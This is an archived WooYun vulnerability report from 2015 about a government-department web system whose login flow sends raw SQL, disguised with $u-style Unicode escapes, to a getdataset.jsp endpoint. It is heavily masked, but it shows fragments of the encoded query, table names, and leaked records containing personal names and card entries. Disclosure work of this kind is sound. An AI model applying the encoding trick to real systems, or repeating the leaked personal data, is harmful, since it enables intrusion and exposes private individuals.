当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155774

漏洞标题:某省敏感部门某系统存在设计缺陷(Unicode编码案例)

相关厂商:某省敏感部门

漏洞作者: 路人甲

提交时间:2015-11-25 13:34

修复时间:2016-01-13 16:12

公开时间:2016-01-13 16:12

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(公安部一所)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-25: 细节已通知厂商并且等待厂商处理中
2015-11-29: 厂商已经确认,细节仅向厂商公开
2015-12-09: 细节向核心白帽子及相关领域专家公开
2015-12-19: 细节向普通白帽子公开
2015-12-29: 细节向实习白帽子公开
2016-01-13: 细节向公众公开

简要描述:

设计缺陷,求帮打马赛克

详细说明:

mask 区域
1.http://**.**.**/login_czw.jsp_
*****2a842dc479c2.png" alt=&quo*****
*****^已经注册^*****
*****feaadadba54e.png" alt=&quo*****
*****此时系统会向^*****
*****ode*****
2.://**.**.**//**.**.**.**/public/getdataset.jsp HTTP/1.1_
*****t: *****
*****uage: *****
******.**/szpt/we*****
*****on/x-www-for*****
*****: gzip, *****
*****IE 9.0; Windows NT 6*****
*******.*******
*****ength*****
***** Keep-*****
***** no-*****
*****R2offKyOG08Kp7*****
**********
*****5F$u0075$u0073$u0065$u0072 $u0077$u0068$u0065$u0072$u0065 c_mobileno='^*****
*****de&g*****
**********
*****^^的而且使^*****
*****^^以^*****
*****ode*****
*****0066$u0072$u006F$u006*****
*****de&g*****
*****^^^*****
*****42910774d056.png" alt=&quo*****

漏洞证明:

mask 区域
*****^^数大^*****
*****c7fdf05bf3bf.png" alt=&quo*****
*****ode*****
*****);var rs=new js*****
*****e("z*****
*****BLE_NAME",&q*****
*****String",&qu*****
*****LGY_ZRQ",&q*****
*****OUSE_TMP",&*****
*****NFO_BZ",&qu*****
*****O_BZ_TMP1",&*****
*****BZ_TMP1_BAK",*****
*****ERSON",&quo*****
*****BSJ_LOG",&q*****
*****CARDNO",&q*****
*****JNLK",&quo*****
*****20130609",&q*****
*****LK_0531",&q*****
*****_20130531",&*****
*****LK_BF",&quo*****
*****LK_HIS",&qu*****
*****LK_JK",&quo*****
*****LK_JK0913",*****
*****LK_OLD",&qu*****
*****JWLK",&quo*****
*****JWLK_JK",&*****
*****XX_HF",&quo*****
*****TDCY",&quo*****
*****_COUNT",&q*****
*****MP",&quot*****
*****FZ_ZJSL",&q*****
*****nd*****
**********
*****de&g*****
*****t;,"14036429*****
*****c250d1b496e4.png" alt=&quo*****
*****有姓名被编^*****
*****ode*****
*****uot;INSERTFLAG","SUNIT_CODE","SORG_LOGGED","SORG_LOGGED_ID","SWHO_LOGGED","DWHEN_LOGGED","SCANCEL_SIGN","DWHEN_CANCELLED","S*****
*****de&g*****
**********
*****^^*****
*****3f3d8d452aae.png" alt=&quo*****
**********
**********
*****这^*****
*****t;,"1868*****
*****^量^*****
*****f59daf2232b9.png" alt=&quo*****
*****^^看*****
*****40d06cc8dac2.png" alt=&quo*****
*****ode*****
*****;2011-06-11 11:37:28.0","fazcbg",null,null,null,"2011-06-10 13:42:06.0","3509811014",null,"fazcbg",null,"1307684230859",null,"1","0","其他&q*****
*****37:46.0","2011-06-11 01:49:55.0","古田县华侨大厦",null,null,null,"2011-06-10 13:42:34.0","3522270029",null,"gthqds",null,"1307684266625",null,"1&*****
*****0","0036","0036","牡丹卡",null,"2008-11-21 18:25:29.0","3504020018","2008-11-23 12:35:10.0","0036",null,null,null,"4","1",null*****
*****;8119","牡丹卡",null,"2008-11-21 18:25:31.0","3504810019","2008-11-22 14:48:28.0","8119",null,null,null,"4","1",null,"2008-11-21*****
*****","8016",null,"牡丹卡",null,"2008-11-21 18:25:34.0","3504280016",null,"8016",null,null,null,"1","1",null,"2008-1*****
*****;2008-11-22 15:12:58.0","陈丽华","陈丽华","牡丹卡",null,"2008-11-21 18:25:54.0","3504260018","2008-11-22 15:12:58.0",null,null,null,null,"4&q*****
*****11-23 09:18:22.0","0327","0054","牡丹卡",null,"2008-11-21 18:25:57.0","3504030027","2008-11-23 09:18:22.0",null,null,null,null,"4",&quo*****
*****t;2008-11-24 21:03:38.0","8019","8019","牡丹卡",null,"2008-11-21 18:26:06.0","3504280019","2008-11-24 21:03:38.0","8019",null,null,null,"4&*****
*****07 21:12:33.0","2717","2717","牡丹卡",null,"2008-11-21 20:52:31.0","3504270017","2008-12-07 21:12:33.0","2717",null,null,null,"4","1&quo*****
*****06-28 20:49:49.0","2909",null,"牡丹卡",null,"2008-11-21 20:52:40.0","3504290009",null,"2909",null,null,null,"1","1&q*****
*****","0042","牡丹卡",null,"2008-11-21 20:52:47.0","3504030021","2008-11-24 15:50:57.0","0042",null,null,null,"4","1",nul*****
*****","0054","0054","牡丹卡",null,"2008-11-21 20:52:58.0","3504030027","2008-11-22 10:09:20.0","0054",null,null,null,"4","1",null,&*****
*****54:34.0","8134","8134","牡丹卡",null,"2008-11-21 20:53:09.0","3504810034","2009-02-11 17:54:34.0",null,null,null,null,"4","1&q*****
*****;,"0042","0042","牡丹卡",null,"2008-11-21 20:43:35.0","3504030021","2008-11-24 15:50:57.0","0042",null,null,null,"4","1&q*****
*****-24 11:17:32.0","唐加联","唐加联","牡丹卡",null,"2008-11-21 20:43:37.0","3504250012","2008-11-24 11:17:32.0",null,null,null,null,"4"*****
*****0","2009-03-20 14:17:18.0","0202",null,"牡丹卡",null,"2008-11-21 20:43:44.0","3504020002",null,"0202",null,null,null,"1","1&quo*****
*****"2009-03-17 00:39:10.0","0244",null,"牡丹卡",null,"2008-11-21 20:43:49.0","3504020044",null,"0244",null,null,null,"1",&q*****
*****2:09.0","2008-11-22 10:31:30.0","2714","2714","牡丹卡",null,"2008-11-21 20:43:54.0","3504270014","2008-11-22 10:31:30.0",null,null,null,null,&quo*****
*****quot;2011-06-11 14:05:58.0","东侨长兴足浴",null,null,null,"2011-06-10 13:42:35.0","3509990799",null,"dqcxzy",null,"1307684273234",null,"1","0",&quo*****
*****nd*****
**********
*****de&g*****
*****^^*****

修复方案:

不要传sql

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-11-29 16:10

厂商回复:

感谢提交!!
验证确认所描述的问题,已通知其修复。

最新状态:

暂无